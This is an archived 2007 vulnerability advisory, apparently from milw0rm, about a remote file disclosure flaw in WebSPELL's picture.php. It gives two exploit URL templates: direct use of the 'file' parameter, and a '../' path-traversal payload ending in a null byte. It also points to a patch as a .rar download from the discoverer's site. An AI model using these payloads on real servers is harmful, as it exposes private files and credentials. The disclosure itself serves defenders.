WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

2007-04-12T00:00:00
ID SECURITYVULNS:DOC:16679
Type securityvulns
Reporter Securityvulns
Modified 2007-04-12T00:00:00

Description

WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

Discovered by: Trex

Visit: www.Trex-Online.net / www.UnderGround.ag

Comment: Happy easter!

/ \ / \ _________

/ / \_/ \ \ / \

\/\ /\/ / GIVE ME A CARROT OR I WILL \

\O O/ \ BLOW UP YOUR HOUSE /

/ ^ \ / _________/

\___/ /_/

/ \

// \\

/\/\/_\

Vulnerability 1:

Advantage: works independently from PHP version.

Disadvantage: works dependently from PHP option register_globals (= on).

http://[SITE][PAHT]/picture.php?file=[FILE]

Vulnerability 2:

Advantage: works independently from PHP option register_globals.

Disadvantage: works dependently from PHP versions (< 4.3.0).

http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00

Solution:

http://fixes.trex-online.net/picture.rar

milw0rm.com [2007-04-05]